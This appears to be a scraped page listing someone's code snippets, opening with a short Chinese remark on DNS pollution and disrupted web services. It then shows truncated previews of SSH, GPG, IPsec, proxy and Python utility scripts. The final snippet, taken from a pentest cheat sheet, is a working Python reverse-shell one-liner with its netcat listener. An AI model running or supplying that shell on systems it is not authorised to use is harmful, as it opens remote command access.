目前整个互联网环境,被破坏最严重地部分,是 Web 服务体验。当直接破坏难以实现时,就会从流程链的上下游着手,如:DNS 污染。
其它地互联网服务类型,例如:邮件,可能小部分会受到 Web 服务上下游破坏地余震,但整体上基本不受影响。
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |
| #!/bin/bash -e | |
| remote="$1@$2" | |
| echo -ne '\e]0;wait... '"$remote"'\a' | |
| eval $(/usr/bin/ssh-pageant -r -a "/tmp/.ssh-pageant-$USERNAME") | |
| localdir="$(cygpath -u "$APPDATA")/gnupg" | |
| extrasock="$localdir/S.gpg-agent.extra" # file containing "PORT\nNONCE" | |
| rdir='$HOME/.gnupg' # remote prefix | |
| rinsock="$rdir/S.gpg-agent" # listen on this socket on server |
| #!/bin/bash | |
| function load_var { | |
| eval $(cat ${1} <( echo -e '\nset -o posix;set\n') | env - bash --noprofile --norc --posix | sed 's/^/'$2'_/') | |
| if [ -n "$IF_IPSEC6" ]; then | |
| PEER_ENDPOINT=$PEER_ENDPOINT6 | |
| SELF_ENDPOINT=$SELF_ENDPOINT6 | |
| fi | |
| } |
| #!/bin/bash | |
| function gen { | |
| dd if=/dev/urandom bs=1 count=10000 2>/dev/null | tr -dc a-f0-9 | fold -w $1 | sed 's/^/0x/' | head -n 1 | |
| } | |
| spi=`gen 8` | |
| reqid=`gen 8` | |
| auth_key=`gen 64` | |
| enc_key=`gen 64` |
| // Use Gists to store code you would like to remember later on | |
| console.log(window); // log the "window" object to the console |
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| """ 测试 Python 在什么情况下会输出 Unicode 字符串 | |
| 需要首先理解在 Python 中 Unicode 类型和 Unicode 字符串指的不是同一个东西。 | |
| Unicode 字符串是 str 类型,但它的值的表现形式是 Unicode 编码形式。 | |
| """ | |
| def printt(str): |
| [Proxy] | |
| WIFI = direct, interface=en2 | |
| VPN = direct, interface=utun0 | |
| [Rule] | |
| DOMAIN-SUFFIX,yach.me,WIFI | |
| FINAL,VPN |
| # http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
| # on the CLIENT, run the following: | |
| # nc -l 12345 | |
| # on the SERVER, start the "reverse shell" | |
| python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345 | |
| # now go to the CLIENT, listen on port 12345 for incoming shell connections | |
| nc -l 12345 |